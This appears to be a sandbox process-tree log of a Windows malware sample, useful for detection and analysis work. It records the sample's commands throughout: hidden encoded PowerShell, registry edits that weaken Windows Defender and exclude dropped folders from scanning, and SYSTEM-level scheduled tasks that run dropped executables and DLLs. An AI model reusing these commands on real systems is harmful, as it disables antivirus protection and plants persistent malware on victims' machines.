C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Temp\FRBJBQRP-20220223-1505.log1⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff947634f50,0x7ff947634f60,0x7ff947634f702⤵
-
C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\igHnmwfRSHoqfpr\axAcyKw.exeC:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\igHnmwfRSHoqfpr\axAcyKw.exe Sk /site_id 525403 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CgqbhrirU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CgqbhrirU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LBHdSxvSsGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LBHdSxvSsGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LHKJFdwYUyvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LHKJFdwYUyvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qSPWXtASFZsjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qSPWXtASFZsjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HxJeplZVKRnYAfVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HxJeplZVKRnYAfVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bsMwgdGxqrwnSkCu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bsMwgdGxqrwnSkCu\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CgqbhrirU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CgqbhrirU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CgqbhrirU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LBHdSxvSsGUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LBHdSxvSsGUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LHKJFdwYUyvU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LHKJFdwYUyvU2" /t REG_DWORD /d 0 /reg:643⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qSPWXtASFZsjC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qSPWXtASFZsjC" /t REG_DWORD /d 0 /reg:643⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\HxJeplZVKRnYAfVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\HxJeplZVKRnYAfVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bsMwgdGxqrwnSkCu /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bsMwgdGxqrwnSkCu /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJeZZXBFS" /SC once /ST 02:26:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJeZZXBFS"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJeZZXBFS"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FNmmdByUIWCoGhfBf" /SC once /ST 02:44:53 /RU "SYSTEM" /TR "\"C:\Windows\Temp\bsMwgdGxqrwnSkCu\aVDTEXthVzMdqDM\iHEirWu.exe\" uR /site_id 525403 /S" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FNmmdByUIWCoGhfBf"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Users\Admin\AppData\Local\Temp\732.exeC:\Users\Admin\AppData\Local\Temp\732.exe1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 372⤵
-
C:\Windows\system32\timeout.exetimeout 373⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\732.exeC:\Users\Admin\AppData\Local\Temp\732.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1AA==3⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\Temp\bsMwgdGxqrwnSkCu\aVDTEXthVzMdqDM\iHEirWu.exeC:\Windows\Temp\bsMwgdGxqrwnSkCu\aVDTEXthVzMdqDM\iHEirWu.exe uR /site_id 525403 /S1⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bnHoQpKIlSSCUFQrDN"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CgqbhrirU\UULKzT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "NYfziUdouSArZkj" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NYfziUdouSArZkj2" /F /xml "C:\Program Files (x86)\CgqbhrirU\BvYxSyb.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "NYfziUdouSArZkj"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NYfziUdouSArZkj"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NpDNAcOvXuDZoE" /F /xml "C:\Program Files (x86)\LHKJFdwYUyvU2\kXVtXMj.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wmKscZdvvFAvN2" /F /xml "C:\ProgramData\HxJeplZVKRnYAfVB\anQSvQw.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WgwRwQXbezZjjPVwf2" /F /xml "C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR\rbZwIZV.xml" /RU "SYSTEM"2⤵
- Blocklisted process makes network request
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vFAVgSKrYZZoOjUDvvE2" /F /xml "C:\Program Files (x86)\qSPWXtASFZsjC\FRRttna.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "phsiVgbIVaYavuCQX" /SC once /ST 01:30:04 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\bsMwgdGxqrwnSkCu\zEHkqBcS\oMxcXql.dll\",#1 /site_id 525403" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "phsiVgbIVaYavuCQX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YsfEB1" /SC once /ST 05:55:04 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YsfEB1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YsfEB1"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FNmmdByUIWCoGhfBf"2⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff947634f50,0x7ff947634f60,0x7ff947634f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,9477697211691777439,7316853337088715549,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1636 /prefetch:82⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5472.0.1407870628\1427282124" -parentBuildID 20200403170909 -prefsHandle 1468 -prefMapHandle 1460 -prefsLen 1 -prefMapSize 219771 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5472 "\\.\pipe\gecko-crash-server-pipe.5472" 1548 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5472.3.1312580994\2094631247" -childID 1 -isForBrowser -prefsHandle 5444 -prefMapHandle 5440 -prefsLen 122 -prefMapSize 219771 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5472 "\\.\pipe\gecko-crash-server-pipe.5472" 5456 tab3⤵
-
